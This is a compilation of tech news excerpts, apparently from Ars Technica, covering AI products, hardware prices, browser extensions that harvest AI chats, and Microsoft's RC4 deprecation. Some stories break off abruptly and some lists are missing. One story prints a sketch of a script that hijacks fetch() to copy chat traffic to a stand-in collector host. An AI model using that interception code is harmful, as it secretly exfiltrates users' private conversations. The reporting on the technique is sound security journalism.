Online fury erupted this week after an LG TV owner claimed that a firmware update installed unremovable generative AI software on their smart TV.
The controversy began on Saturday, when a Reddit user posted about the sudden appearance of a Microsoft Copilot icon on their device (something Windows users are all too familiar with). The Reddit user claimed that a “new software update installed Copilot” onto their LG TV and that it couldn’t be deleted.
“Pre-installed crap is universally dogshit. If I wanted it, I’d have installed it myself eventually. The whole reason it’s bundled is because no one would choose it… Burn your television,” another Reddit user responded in the thread, which has 36,000 upvotes as of this writing.
At this point, most competitive online multiplayer games on the PC come with some kind of kernel-level anti-cheat software. As we’ve written before, this is software that runs with higher privileges than most other apps and games on your PC, allowing it to load earlier in the boot process and detect advanced methods of cheating. More recently, anti-cheat software has started to require additional Windows security features like Secure Boot, a TPM 2.0 module, and virtualization-based memory integrity protection.
Riot Games, best known for Valorant, League of Legends, and its Vanguard anti-cheat software, has often been among the earliest to implement new anti-cheat requirements. There’s already a long list of checks that systems need to clear before they’ll be allowed to play Riot’s games online, and now the studio is announcing a new one: a BIOS update requirement that will be imposed on “certain players” following Riot’s discovery of a UEFI bug that could allow especially dedicated and motivated cheaters to circumvent certain memory protections.
In short, the bug affects the input-output memory management unit (IOMMU) “on some UEFI-based motherboards from multiple vendors.” One feature of the IOMMU is to protect system memory from direct access during boot by external hardware devices, which otherwise might manipulate the contents of your PC’s memory in ways that could enable cheating.
Google is generally happy to see people using generative AI tools to create content, and it’s doubly happy when they publish it on its platforms. But there are limits to everything. Two YouTube channels that attracted millions of subscribers with AI-generated movie trailers have been shuttered.
Screen Culture and KH Studio flooded the site with fake but often believable trailers. The channels, which had a combined audience of more than 2 million subscribers, became a thorn in Google’s side in early 2025 when other YouTubers began griping about their sudden popularity in the age of AI. The channels produced videos with titles like “GTA: San Andreas (2025) Teaser Trailer” and “Malcolm In The Middle Reboot (2025) First Trailer.” Of course, neither of those projects exists, but that didn’t stop them from appearing in user feeds.
Google demonetized the channels in early 2025, forcing them to adopt language that made it clear they were not official trailers. The channels were able to monetize again, but the disclaimers were not consistently used. Indeed, many of the most popular videos from those channels in recent months included no “parody” or “concept trailer” disclosures. Now, visiting either channel’s page on YouTube produces an error reading, “This page isn’t available. Sorry about that. Try searching for something else.”
Peacock subscribers will see ads immediately upon opening the streaming app or website next year. It’s a bold new strategy for attracting advertisers—something that’s been increasingly important to subscription-based streaming services—but it also risks alienating viewers.
As reported by Variety, the new type of ads will display on the profile selection page that shows when a subscriber launches Peacock. Starting next year, instead of the profile page just showing your different Peacock profiles, most of the page will be dominated by an advertorial image. The circles of NBCUniversal-owned characters selected for user profiles will be relegated to a vertical column on the screen’s left side.
To avoid seeing what NBCUniversal is calling “Arrival Ads” every time you open Peacock, you need to subscribe to Peacock’s most expensive plan, which is ad-free and starts at $17 per month (Peacock’s ad-based plans start at $8/month.)
The first few months of 2025 were full of graphics card reviews where we generally came away impressed with performance and completely at a loss on availability and pricing. The testing in these reviews is useful regardless, but when it came to extra buying advice, the best we could do was to compare Nvidia’s imaginary pricing to AMD’s imaginary pricing and wait for availability to improve.
Now, as the year winds down, we’re facing price spikes for memory and storage that are unlike anything I’ve seen in two decades of pricing out PC parts. Pricing for most RAM kits has increased dramatically since this summer, driven by overwhelming demand for these parts in AI data centers. Depending on what you’re building, it’s now very possible that the memory could be the single most expensive component you buy; things are even worse now than they were the last time we compared prices a few weeks ago.
| Component | Aug. 2025 price | Nov. 2025 price | Dec. 2025 price |
|---|---|---|---|
| Patriot Viper Venom 16GB (2 x 8GB) DDR5-6000 | $49 | $110 | $189 |
| Western Digital WD Blue SN5000 500GB | $45 | $69 | $102* |
| Silicon Power 16GB (2 x 8GB) DDR4-3200 | $34 | $89 | $104 |
| Western Digital WD Blue SN5000 1TB | $64 | $111 | $135* |
| Team T-Force Vulcan 32GB DDR5-6000 | $82 | $310 | $341 |
| Western Digital WD Blue SN5000 2TB | $115 | $154 | $190* |
| Western Digital WD Black SN7100 2TB | $130 | $175 | $210 |
| Team Delta RGB 64GB (2 x 32GB) DDR5-6400 | $190 | $700 | $800 |
Some SSDs are getting to the point where they’re twice as expensive as they were this summer (for this comparison, I’ve swapped the newer WD Blue SN5100 pricing in for the SN5000, since the drive is both newer and slightly cheaper as of this writing). Some RAM kits, meanwhile, are around four times as expensive as they were in August. Yeesh.
New GPT Image 1.5 allows more detailed conversational image editing, for better or worse.
For most of photography’s roughly 200-year history, altering a photo convincingly required either a darkroom, some Photoshop expertise, or, at minimum, a steady hand with scissors and glue. On Tuesday, OpenAI released a tool that reduces the process to typing a sentence.
It’s not the first company to do so. While OpenAI had a conversational image-editing model in the works as far back as GPT-4o in 2024, Google beat OpenAI to market in March with a public prototype, then refined it into the popular Nano Banana image model (and Nano Banana Pro). The enthusiastic response to Google’s image-editing model in the AI community got OpenAI’s attention.
OpenAI’s new GPT Image 1.5 is an AI image synthesis model that reportedly generates images up to four times faster than its predecessor and costs about 20 percent less through the API. The model rolled out to all ChatGPT users on Tuesday and represents another step toward making photorealistic image manipulation a casual process that requires no particular visual skills.
GPT Image 1.5 is notable because it’s a “native multimodal” image model, meaning image generation happens inside the same neural network that processes language prompts. (In contrast, DALL-E 3, an earlier OpenAI image generator previously built into ChatGPT, used a different technique called diffusion to generate images.)
This newer type of model, which we covered in more detail in March, treats images and text as the same kind of thing: chunks of data called “tokens” to be predicted, patterns to be completed. If you upload a photo of your dad and type “put him in a tuxedo at a wedding,” the model processes your words and the image pixels in a unified space, then outputs new pixels the same way it would output the next word in a sentence.
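To make that concrete, here is a toy sketch of the unified-token idea. It is purely illustrative: the token IDs, the stub predictor, and the generation loop are invented for this example and are not OpenAI’s actual architecture.

```typescript
// Toy sketch of a "native multimodal" model: text tokens and image tokens
// live in one sequence, and the model's only job is to predict the next
// token, whatever kind it is.
type Token = { kind: "text" | "image"; id: number };

// A hypothetical prompt: the user's words plus the uploaded photo, already
// encoded into discrete image tokens by a separate tokenizer.
const prompt: Token[] = [
  { kind: "text", id: 9341 },   // "put"
  { kind: "text", id: 112 },    // "him in"
  { kind: "text", id: 2077 },   // "a tuxedo"
  { kind: "image", id: 50021 }, // first patch of the uploaded photo
  { kind: "image", id: 50784 }, // ...and so on
];

// Stand-in for the trained transformer, which would score every possible
// next token given the whole mixed-modality context.
function predictNextToken(_context: Token[]): Token {
  return { kind: "image", id: 50000 + Math.floor(Math.random() * 1024) };
}

// "Generating" the edited picture is just emitting enough image tokens,
// which a decoder then turns back into pixels.
const output: Token[] = [...prompt];
while (output.length < prompt.length + 256) {
  output.push(predictNextToken(output));
}
console.log(`generated ${output.length - prompt.length} image tokens`);
```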
Using this technique, GPT Image 1.5 can more easily alter visual reality than earlier AI image models, changing someone’s pose or position, or rendering a scene from a slightly different angle, with varying degrees of success. It can also remove objects, change visual styles, adjust clothing, and refine specific areas while preserving facial likeness across successive edits. You can converse with the AI model about a photograph, refining and revising, the same way you might workshop a draft of an email in ChatGPT.
Fidji Simo, OpenAI’s CEO of applications, wrote in a blog post that ChatGPT’s chat interface was never designed for visual work. “Creating and editing images is a different kind of task and deserves a space built for visuals,” Simo wrote. To that end, OpenAI introduced a dedicated image creation space in ChatGPT’s sidebar with preset filters and trending prompts.
The release’s timing seems like a direct response to Google’s technical gains in AI, including a massive growth in chatbot user base. In particular, Google’s Nano Banana image model (and Nano Banana Pro) became popular on social media after its August release, thanks to its ability to render text relatively clearly and preserve faces consistently across edits.
OpenAI’s previous token-based image synthesis model could make some targeted edits based on conversational prompts, but it often changed facial details and other elements that users might have wanted to keep. GPT Image 1.5 appears designed to match the editing features that Google already shipped. OpenAI says the previous version will remain available as a custom GPT (for now) for users who prefer the older ChatGPT image generator.
GPT Image 1.5 is not perfect. In our brief testing, it didn’t always follow prompting directions very well. But when it does work, the results seem more convincing and detailed than OpenAI’s previous multimodal image model. For a more detailed comparison, a software consultant named Shaun Pedicini has put together an instructive site (“GenAI Image Editing Showdown”) that conducts A/B testing of various AI image models.
And while we’ve written about this a lot over the past few years, it’s probably worth repeating that barriers to realistic photo editing and manipulation keep dropping. This kind of seamless, realistic, effortless AI image manipulation may prompt (pun intended) a cultural recalibration of what visual images mean to society. It can also feel a little scary, for someone who grew up in an earlier media era, to see yourself put into situations that didn’t really happen.
For most of photography’s history, a convincing forgery required skill, time, and resources. Those barriers made fakery rare enough that we could treat many photographs as a reasonable proxy for truth, although they could be manipulated (and often were). That era has ended due to AI, but GPT Image 1.5 seems to remove yet more of the remaining friction.
The capability to preserve facial likeness across edits has obvious utility for legitimate photo editing and equally obvious potential for misuse. Image generators have already been used to create non-consensual intimate imagery and impersonate real people.
With those hazards in mind, OpenAI’s image generators have always included a filter that usually blocks sexual or violent outputs. But it’s still possible to create embarrassing images of people without their consent (even though it violates OpenAI’s terms of service) while avoiding those topics. The company says generated images include C2PA metadata identifying them as AI-created, though that data can be stripped by resaving the file.
Speaking of fakes, text rendering has been a long-standing weakness in image generators that has slowly gotten better. Prompt some older image synthesis models to create a sign or poster with specific words, and the results often come back garbled or misspelled.
OpenAI says GPT Image 1.5 can handle denser and smaller text. The company’s blog post includes a demonstration where the model generated an image of a newspaper with a multi-paragraph article, complete with headlines, a byline, benchmark tables, and body text that remains legible at the paragraph level. Whether this holds up across varied prompts will require broader testing.
While the newspaper in the example looks fake now, it’s another step toward the potential erosion of the public’s perception of the pre-Internet historical record as image synthesis becomes more realistic.
OpenAI acknowledged in its blog post that the new model still has problems, including limited support for certain drawing styles and mistakes when generating images that require scientific accuracy. But they think it will get better over time. “We believe we’re still at the beginning of what image generation can enable,” the company wrote. And if the past three years of progress in image synthesis are any indication, they may be correct.
Benj Edwards
Senior AI Reporter
The extensions, available for Chromium browsers, harvest full AI conversations over months.
Browser extensions with more than 8 million installs are harvesting complete and extended AI conversations from users and selling them for marketing purposes, according to data collected from the Google and Microsoft pages hosting them.
Security firm Koi discovered the eight extensions, which as of late Tuesday night remained available in both Google’s and Microsoft’s extension stores. Seven of them carry “Featured” badges, which are endorsements meant to signal that the companies have determined the extensions meet their quality standards. The free extensions provide functions such as VPN routing to safeguard online privacy and ad blocking for ad-free browsing. All provide assurances that user data remains anonymous and isn’t shared for purposes other than their described use.
An examination of the extensions’ underlying code tells a much more complicated story. Each contains eight of what Koi calls “executor” scripts, one each for ChatGPT, Claude, Gemini, and five other leading AI chat platforms. The scripts are injected into webpages anytime the user visits one of these platforms. From there, the scripts override browsers’ built-in functions for making network requests and receiving responses.
As a result, all interaction between the browser and the AI bots is routed not through the legitimate browser APIs—in this case fetch() and XMLHttpRequest—but through the executor script. The extensions eventually compress the data and send it to endpoints belonging to the extension maker.
“By overriding the [browser APIs], the extension inserts itself into that flow and captures a copy of everything before the page even displays it,” Koi CTO Idan Dardikman wrote in an email. “The consequence: The extension sees your complete conversation in raw form—your prompts, the AI’s responses, timestamps, everything—and sends a copy to their servers.”
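A minimal sketch of the interception pattern Koi describes might look like the following. The collector URL and payload shape are hypothetical; this illustrates the technique, not the extensions’ actual code.

```typescript
// Minimal sketch: an injected script wraps the page's fetch() so it can
// copy chat traffic before the page sees it. "collector.example" is a
// hypothetical endpoint, not one of the extensions' real servers.
const originalFetch = window.fetch.bind(window);

window.fetch = async (input: RequestInfo | URL, init?: RequestInit): Promise<Response> => {
  const response = await originalFetch(input, init);

  // Clone the response so the page still receives an untouched body.
  response
    .clone()
    .text()
    .then((body) => {
      navigator.sendBeacon(
        "https://collector.example/ingest", // hypothetical harvesting endpoint
        JSON.stringify({
          url: input instanceof Request ? input.url : String(input),
          requestBody: typeof init?.body === "string" ? init.body : null,
          responseBody: body,
          timestamp: Date.now(),
        })
      );
    })
    .catch(() => {
      /* ignore bodies that can't be read as text */
    });

  return response;
};
```

Because the wrapper hands the original response back untouched, the page behaves normally, which is why users see no sign of the collection.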
Besides ChatGPT, Claude, and Gemini, the extensions harvest all conversations from Copilot, Perplexity, DeepSeek, Grok, and Meta AI. Koi said the full description of the data captured includes:
The executor script runs independently from the VPN networking, ad blocking, or other core functionality. That means that even when a user toggles off VPN networking, AI protection, ad blocking, or other functions, the conversation collection continues. The only way to stop the harvesting is to disable the extension in the browser settings or to uninstall it.
Koi said it first discovered the conversation harvesting in Urban VPN Proxy, a VPN routing extension that lists “AI protection” as one of its benefits. The data collection began in early July with the release of version 5.5.0.
“Anyone who used ChatGPT, Claude, Gemini, or the other targeted platforms while Urban VPN was installed after July 9, 2025 should assume those conversations are now on Urban VPN’s servers and have been shared with third parties,” the company said. “Medical questions, financial details, proprietary code, personal dilemmas—all of it, sold for ‘marketing analytics purposes.'”
Following that discovery, the security firm uncovered seven additional extensions with identical AI harvesting functionality. Four of the extensions are available in the Chrome Web Store. The other four are on the Edge add-ons page. Collectively, they have been installed more than 8 million times.
They are:
Chrome Web Store:
Edge Add-ons:
The extensions come with conflicting messages about how they handle bot conversations, which often contain deeply personal details about users’ physical and mental health, finances, personal relationships, and other sensitive matters that could be a gold mine for marketers and data brokers. The Urban VPN Proxy listing in the Chrome Web Store, for instance, cites “AI protection” as a benefit. It goes on to say:
Our VPN provides added security features to help shield your browsing experience from phishing attempts, malware, intrusive ads and AI protection which checks prompts for personal data (like an email or phone number), checks AI chat responses for suspicious or unsafe links and displays a warning before click or submit your prompt.
On the privacy policy for the extension, Google says the developer has declared that user data isn’t sold to third parties outside of approved use cases and won’t be “used or transferred for purposes that are unrelated to the item’s core functionality.” The page goes on to list the personal data handled as location, web history, and website content.
Koi said that a consent prompt that the extensions display during setup notifies the user that they process “ChatAI communication,” “pages you visit,” and “security signals.” The notification goes on to say that the data is processed to “provide these protections,” which presumably means the core functions such as VPN routing or ad blocking.
The only explicit mention of AI conversations being harvested is in legalese buried in the privacy policy, such as this 6,000-word one for Urban VPN Proxy, posted on each extension website. There, it says that the extension will “collect the prompts and outputs queried by the End-User or generated by the AI chat provider, as applicable.” It goes on to say that the extension developer will “disclose the AI prompts for marketing analytics purposes.”
All eight extensions and the privacy policies covering them are developed and written by Urban Cyber Security, a company that says its apps and extensions are used by 100 million people. The policies say the extensions share “Web Browsing Data” with “our affiliated company,” which is listed as both BiScience and B.I Science. The affiliated company “uses this raw data and creates insights which are commercially used and shared with Business Partners.” The policy goes on to refer users to the BiScience privacy policy. BiScience, whose privacy practices have been scrutinized before, says its services “transform enormous volumes of digital signals into clear, actionable market intelligence.”
It’s hard to fathom how both Google and Microsoft would allow such extensions onto their platforms at all, let alone go out of their way to endorse seven of them with a featured badge. Neither company returned emails asking how they decide which extensions qualify for such a distinction, if they have plans to stop making them available to Chrome and Edge users, or why the privacy policies are so unclear to normal users.
Messages sent to both individual extension developers and Urban Cyber Security went unanswered. BiScience provides no email. A call to the company’s New York office was answered by someone who said they were in Israel and to call back during normal business hours in that country.
Koi’s discovery is the latest cautionary tale illustrating the growing perils of being online. It’s questionable in the first place whether people should trust their most intimate secrets and sensitive business information to AI chatbots, which come with no HIPAA assurances, attorney-client privilege, or expectations of privacy. Yet increasingly, that’s exactly what AI companies are encouraging, and users, it seems, are more than willing to comply.
Compounding the risk is the rush to install free apps and extensions—particularly those from little-known developers and providing at best minimal benefits—on devices storing and transmitting these chats. Taken together, they’re a recipe for disaster, and that’s exactly what we have here.
Dan Goodin
Senior Security Editor
Apple doesn’t like to talk about its upcoming products before it’s ready, but sometimes the company’s software does the talking for it. So far this week we’ve had a couple of software-related leaks that have outed products Apple is currently testing—one a pre-release build of iOS 26, and the other some leaked files from a kernel debug kit (both via MacRumors).
Most of the new devices referenced in these leaks are straightforward updates to products that already exist: a new Apple TV, a HomePod mini 2, new AirTags and AirPods, an M4 iPad Air, a 12th-generation iPad to replace the current A16 version, next-generation iPhones (including the 17e, 18, and the rumored foldable model), a new Studio Display model, some new smart home products we’ve already heard about elsewhere, and M5 updates for the MacBook Air, Mac mini, Mac Studio, and the other MacBook Pros. There’s also yet another reference to the lower-cost MacBook that Apple is apparently planning as a replacement for the M1 MacBook Air it still sells via Walmart for $599.
For power users, though, the most interesting revelation might be that Apple is working on a higher-end Apple Silicon iMac powered by an M5 Max chip. The kernel debug kit references an iMac with the internal identifier J833c, based on a platform identified as H17C—and H17C is apparently based on the M5 Max, rather than a lower-end M5 chip. (For those who don’t have Apple’s branding memorized, “Max” is associated with Apple’s second-fastest chips; the M5 Max would be faster than the M5 or M5 Pro, but slower than the rumored M5 Ultra.)
Dictionary codifies the term that took hold in 2024 for low-quality AI-generated content.
Like most tools, generative AI models can be misused. And when the misuse gets bad enough that a major dictionary notices, you know it’s become a cultural phenomenon.
On Sunday, Merriam-Webster announced that “slop” is its 2025 Word of the Year, reflecting how the term has become shorthand for the flood of low-quality AI-generated content that has spread across social media, search results, and the web at large. The dictionary defines slop as “digital content of low quality that is produced usually in quantity by means of artificial intelligence.”
“It’s such an illustrative word,” Merriam-Webster president Greg Barlow told the Associated Press. “It’s part of a transformative technology, AI, and it’s something that people have found fascinating, annoying, and a little bit ridiculous.”
To select its Word of the Year, Merriam-Webster’s editors review data on which words rose in search volume and usage, then reach consensus on which term best captures the year. Barlow told the AP that the spike in searches for “slop” reflects growing awareness among users that they are encountering fake or shoddy content online.
Dictionaries have been tracking AI’s impact on language for the past few years, with Cambridge having selected “hallucinate” as its 2023 word of the year due to the tendency of AI models to generate plausible-but-false information (long-time Ars readers will be happy to hear there’s another term for that in the dictionary as well).
The trend extends to online culture in general, which is rife with new coinages. This year, Oxford University Press chose “rage bait,” referring to content designed to provoke anger for engagement. Cambridge Dictionary selected “parasocial,” describing one-sided relationships between fans and celebrities or influencers.
As the AP points out, the word “slop” originally entered English in the 1700s to mean soft mud. By the 1800s, it had evolved to describe food waste fed to pigs, and eventually came to mean rubbish or products of little value. The new AI-related definition builds on that history of describing something unwanted and unpleasant.
Although he didn’t coin the term “AI slop,” independent AI researcher Simon Willison helped document its rise in May 2024 when he wrote on his blog comparing it to how “spam” had previously become the word for unwanted email. Quoting a tweet from an X user named @deepfates, Willison showed that the “AI slop” term began circulating in online communities shortly before he wrote his post advocating for its use.
The “slop” term carries a dismissive tone that sets it clearly apart from prominent corporate hype language about the promises and even existential perils of AI. “In 2025, amid all the talk about AI threats, slop set a tone that’s less fearful, more mocking,” Merriam-Webster wrote in a blog post. “The word sends a little message to AI: when it comes to replacing human creativity, sometimes you don’t seem too superintelligent.”
In its blog post announcing the word of the year selection, Merriam-Webster noted that 2025 saw a flood of AI-generated videos, off-kilter advertising images, propaganda, fake news, AI-written books, and what it called “workslop,” AI-generated work documents and reports that waste coworkers’ time. Ars Technica has covered similar phenomena invading various fields, including using the term “hiring slop” to describe an overflow of AI-generated résumés in June.
While some AI critics relish dismissing all generated output as “slop,” there’s some subjective nuance about what earns the label. As former Evernote CEO Phil Libin told Axios in April, the distinction may come down to intention: “When AI is used to produce mediocre things with less effort than it would have taken without AI, it’s slop. When it’s used to make something better than it could have been made without AI, it’s a positive augmentation.”
Willison had his own nuanced take, since he’s a proponent of using AI responsibly as tools to help with tasks like programming, but not with spamming. “Not all promotional content is spam, and not all AI-generated content is slop,” he wrote in May 2024 when discussing the term. “But if it’s mindlessly generated and thrust upon someone who didn’t ask for it, slop is the perfect term for it.”
Benj Edwards
Senior AI Reporter
The weak RC4 cipher used for administrative authentication has been a hacker holy grail for decades.
Microsoft is killing off an obsolete and vulnerable encryption cipher that Windows has supported by default for 26 years, following more than a decade of devastating hacks that exploited it and, more recently, blistering criticism from a prominent US senator.
When the software maker rolled out Active Directory in 2000, it made RC4 the sole means of securing the Windows component, which administrators use to configure and provision fellow administrator and user accounts inside large organizations. RC4, short for Rivest Cipher 4, is a nod to mathematician and cryptographer Ron Rivest of RSA Security, who developed the stream cipher in 1987. Within days of the trade-secret-protected algorithm being leaked in 1994, a researcher demonstrated a cryptographic attack that significantly weakened the security it had been believed to provide. Despite the known susceptibility, RC4 remained a staple in encryption protocols, including SSL and its successor TLS, until about a decade ago.
One of the most visible holdouts in supporting RC4 has been Microsoft. Eventually, Microsoft upgraded Active Directory to support the much more secure AES encryption standard. But by default, Windows servers have continued to respond to RC4-based authentication requests and return an RC4-based response. The RC4 fallback has been a favorite weakness hackers have exploited to compromise enterprise networks. Use of RC4 played a key role in last year’s breach of health giant Ascension. The breach caused life-threatening disruptions at 140 hospitals and put the medical records of 5.6 million patients into the hands of the attackers. US Senator Ron Wyden (D-Ore.) in September called on the Federal Trade Commission to investigate Microsoft for “gross cybersecurity negligence,” citing the continued default support for RC4.
Last week, Microsoft said it was finally deprecating RC4 and cited its susceptibility to Kerberoasting, the form of attack, known since 2014, that was the root cause of the initial intrusion into Ascension’s network.
“By mid-2026, we will be updating domain controller defaults for the Kerberos Key Distribution Center (KDC) on Windows Server 2008 and later to only allow AES-SHA1 encryption,” Matthew Palko, a Microsoft principal program manager, wrote. “RC4 will be disabled by default and only used if a domain administrator explicitly configures an account or the KDC to use it.”
AES-SHA1, an algorithm widely believed to be secure, has been available in all supported Windows versions since the rollout of Windows Server 2008. Since then, Windows clients have authenticated by default using the much more secure standard, and servers have responded in kind. But Windows servers, also by default, have continued to accept RC4-based authentication requests and return RC4-based responses, leaving networks open to Kerberoasting.
Following next year’s change, RC4 authentication will no longer function unless administrators perform the extra work to allow it. In the meantime, Palko said, it’s crucial that admins identify any systems inside their networks that rely on the cipher. Despite the known vulnerabilities, RC4 remains the sole means some third-party legacy systems have for authenticating to Windows networks. These systems can often go overlooked in networks even though they are required for crucial functions.
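That extra work typically runs through Active Directory’s standard controls for Kerberos encryption types, such as the msDS-SupportedEncryptionTypes bitmask on account objects (or the equivalent Group Policy setting). The flag values below are the documented ones; the sketch itself is only an illustration, not Microsoft’s migration tooling.

```typescript
// Documented Kerberos encryption-type flags used by Active Directory's
// msDS-SupportedEncryptionTypes attribute (illustrative sketch only).
const KerberosEncType = {
  DES_CBC_CRC: 0x01,
  DES_CBC_MD5: 0x02,
  RC4_HMAC_MD5: 0x04,
  AES128_CTS_HMAC_SHA1_96: 0x08,
  AES256_CTS_HMAC_SHA1_96: 0x10,
} as const;

// An AES-only account, matching the post-2026 default Microsoft describes:
const aesOnly =
  KerberosEncType.AES128_CTS_HMAC_SHA1_96 |
  KerberosEncType.AES256_CTS_HMAC_SHA1_96; // 0x18

// A value that opts an account back into RC4, which admins will have to
// set explicitly once the new defaults land:
const aesPlusRc4 = aesOnly | KerberosEncType.RC4_HMAC_MD5; // 0x1c

console.log(aesOnly.toString(16), aesPlusRc4.toString(16)); // "18" "1c"
```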
To streamline the identification of such systems, Microsoft is making several tools available. One is an update to KDC logs that will track both the requests and responses systems make using RC4 through Kerberos. Kerberos is an industry-wide authentication protocol for verifying the identities of users and services over a non-secure network. It’s the sole means of mutual authentication to Active Directory, which hackers attacking Windows networks widely consider a holy grail because of the control they gain once it has been compromised.
Microsoft is also introducing new PowerShell scripts to sift through security event logs to more easily pinpoint problematic RC4 usage.
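Microsoft’s scripts aren’t reproduced here, but the underlying idea is straightforward: Kerberos service-ticket events (Event ID 4769) record a ticket encryption type, and a value of 0x17 indicates RC4-HMAC. A hypothetical filter over an exported log might look like this, with the file name and column headers assumed for illustration:

```typescript
// Hypothetical sketch: flag RC4-encrypted service tickets in a CSV export
// of Windows security event 4769. Column names are assumptions for this
// example, not Microsoft's actual script output.
import { readFileSync } from "node:fs";

const RC4_HMAC = "0x17"; // ticket encryption type for RC4-HMAC

const rows = readFileSync("kerberos-4769-export.csv", "utf8")
  .trim()
  .split("\n")
  .map((line) => line.split(","));

const [header, ...records] = rows;
const encTypeCol = header.indexOf("TicketEncryptionType");
const serviceCol = header.indexOf("ServiceName");

// Every service issued an RC4-encrypted ticket is a system that still
// depends on the weak cipher and needs attention before the default flips.
for (const record of records) {
  if (record[encTypeCol]?.toLowerCase() === RC4_HMAC) {
    console.log(`RC4 ticket issued for: ${record[serviceCol]}`);
  }
}
```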
Microsoft said it has steadily worked over the past decade to deprecate RC4, but that the task wasn’t easy.
“The problem though is that it’s hard to kill off a cryptographic algorithm that is present in every OS that’s shipped for the last 25 years and was the default algorithm for so long,” Steve Syfuhs, who runs Microsoft’s Windows Authentication team, wrote on Bluesky. “See,” he continued, “the problem is not that the algorithm exists. The problem is how the algorithm is chosen, and the rules governing that spanned 20 years of code changes.”
Over those two decades, developers discovered a raft of critical RC4 vulnerabilities that required “surgical” fixes. Microsoft considered deprecating RC4 by this year, but ultimately “punted” after discovering vulnerabilities that required still more fixes. During that time Microsoft introduced some “minor improvements” that favored the use of AES, and as a result, usage dropped by “orders of magnitude.”
“Within a year we had observed RC4 usage drop to basically nil. This is not a bad thing and in fact gave us a lot more flexibility to kill it outright because we knew it genuinely wasn’t going to break folks, because folks weren’t using it.”
Syfuhs went on to document additional challenges Microsoft encountered and the approach it took to solving them.
While RC4 has known cipher weaknesses that make it insecure, Kerberoasting exploits a separate weakness. As implemented in Active Directory authentication, it uses no cryptographic salt and a single round of the MD4 hashing function. Salt is a technique that adds random input to each password before it is hashed, forcing hackers to invest considerable time and resources into cracking each hash individually rather than relying on precomputed tables. MD4, meanwhile, is a fast algorithm that requires modest resources. Microsoft’s implementation of AES-SHA1 is much slower and iterates the hash to further slow down cracking efforts. Taken together, AES-SHA1-hashed passwords require about 1,000 times the time and resources to be cracked.
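To make the difference concrete, here is a rough sketch of the two derivations, assuming the standard NT-hash construction for RC4 keys and PBKDF2-HMAC-SHA1 with 4,096 iterations for AES keys; it omits Kerberos’ final key-derivation step and is an illustration, not a working implementation.

```typescript
// Rough sketch of why the AES path is far costlier to attack than the RC4
// path in Active Directory. Values are illustrative, not production code.
import { createHash, pbkdf2Sync } from "node:crypto";

const password = "correct horse battery staple";

// RC4 path: one fast, unsalted MD4 hash of the UTF-16LE password per guess.
// (MD4 may require OpenSSL's legacy provider on recent Node.js builds.)
const rc4Key = createHash("md4")
  .update(Buffer.from(password, "utf16le"))
  .digest();

// AES path: salted with the realm and account name and iterated thousands
// of times, so every password guess costs far more work.
const salt = "EXAMPLE.COMsomeaccount"; // assumed salt format for illustration
const aesKey = pbkdf2Sync(password, salt, 4096, 32, "sha1");

console.log(rc4Key.toString("hex"), aesKey.toString("hex"));
```

Run against the same password list, the salted, iterated derivation is what produces the roughly 1,000-fold cost difference described above.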
Windows admins would do well to audit their networks for any usage of RC4. Given its wide adoption and continued use industry-wide, it may still be active, much to the surprise and chagrin of those charged with defending against hackers.
Dan Goodin
Senior Security Editor
Google began offering “dark web reports” a while back, but the company has just announced the feature will be going away very soon. In an email to users of the service, Google says it will stop telling you about dark web data leaks in February. This probably won’t negatively impact your security or privacy because, as Google points out in its latest email, there’s really nothing you can do about the dark web.
The dark web reports launched in March 2023 as a perk for Google One subscribers. The reports were expanded to general access in 2024. Now, barely a year later, Google has decided it doesn’t see the value in this type of alert for users. Dark web reports provide a list of partially redacted user data retrieved from shadowy forums and sites where such information is bought and sold. However, that’s all it is—a list.
The dark web consists of so-called hidden services hosted inside the Tor network. You need a special browser or connection tools in order to access Tor hidden services, and its largely anonymous nature has made it a favorite hangout for online criminals. If a company with your personal data has been hacked, that data probably lives somewhere on the dark web.
Shenzhen-based Picea Robotics, its lender and primary supplier, will acquire all of iRobot’s shares.
Roomba maker iRobot has filed for bankruptcy and will be taken over by its Chinese supplier after the company that popularized the robot vacuum cleaner fell under the weight of competition from cheaper rivals.
The US-listed group on Sunday said it had filed for Chapter 11 bankruptcy in Delaware as part of a restructuring agreement with Shenzhen-based Picea Robotics, its lender and primary supplier, which will acquire all of iRobot’s shares.
The deal comes nearly two years after a proposed $1.5 billion acquisition by Amazon fell through over competition concerns from EU regulators.
Shares in iRobot traded at about $4 a share on Friday, well below the $52 a share offered by Amazon.
“Today’s announcement marks a pivotal milestone in securing iRobot’s long-term future,” said Gary Cohen, iRobot’s chief executive. “The transaction will strengthen our financial position and will help deliver continuity for our consumers, customers and partners.”
Founded in 1990 by engineers from the Massachusetts Institute of Technology, iRobot helped introduce robotics into the home, ultimately selling more than 40 million devices, including its Roomba vacuum cleaner, according to the company.
In recent years, it has faced competition from cheaper Chinese rivals, including Picea, putting pressure on sales and forcing iRobot to reduce headcount. A management shake-up in early 2024 saw the departure of its co-founder as chief executive.
Amazon proposed buying the company in 2023, seeing synergy with its Alexa-powered smart speakers and Ring doorbells.
EU regulators, however, pushed back on the deal, raising concerns it would lead to reduced visibility for rival vacuum cleaner brands on Amazon’s website.
Amazon and iRobot terminated the deal little more than a month after Adobe’s $10 billion purchase of design software maker Figma was abandoned amid heightened US antitrust scrutiny under Joe Biden’s administration.
Although iRobot received $94 million in compensation for the termination of its deal with Amazon, a significant portion was used to pay advisory fees and repay part of a $200 million loan from private equity group Carlyle.
Picea’s Hong Kong subsidiary acquired the remaining $191 million of debt from Carlyle last month. At the time, iRobot already owed Picea $161.5 million for manufacturing services, nearly $91 million of which was overdue.
Alvarez & Marsal is serving as iRobot’s investment banker and financial adviser. The company is receiving legal advice from Paul, Weiss, Rifkind, Wharton & Garrison.
© 2025 The Financial Times Ltd. All rights reserved. Not to be redistributed, copied, or modified in any way.
“The vast majority of Codex is built by Codex,” OpenAI told us about its new AI coding agent.
With the popularity of AI coding tools rising among software developers, their adoption has begun to touch every aspect of the process, including the improvement of AI coding tools themselves.
In interviews with Ars Technica this week, OpenAI employees revealed the extent to which the company now relies on its own AI coding agent, Codex, to build and improve the development tool. “I think the vast majority of Codex is built by Codex, so it’s almost entirely just being used to improve itself,” said Alexander Embiricos, product lead for Codex at OpenAI, in a conversation on Tuesday.
Codex, which OpenAI launched in its modern incarnation as a research preview in May 2025, operates as a cloud-based software engineering agent that can handle tasks like writing features, fixing bugs, and proposing pull requests. The tool runs in sandboxed environments linked to a user’s code repository and can execute multiple tasks in parallel. OpenAI offers Codex through ChatGPT’s web interface, a command-line interface (CLI), and IDE extensions for VS Code, Cursor, and Windsurf.
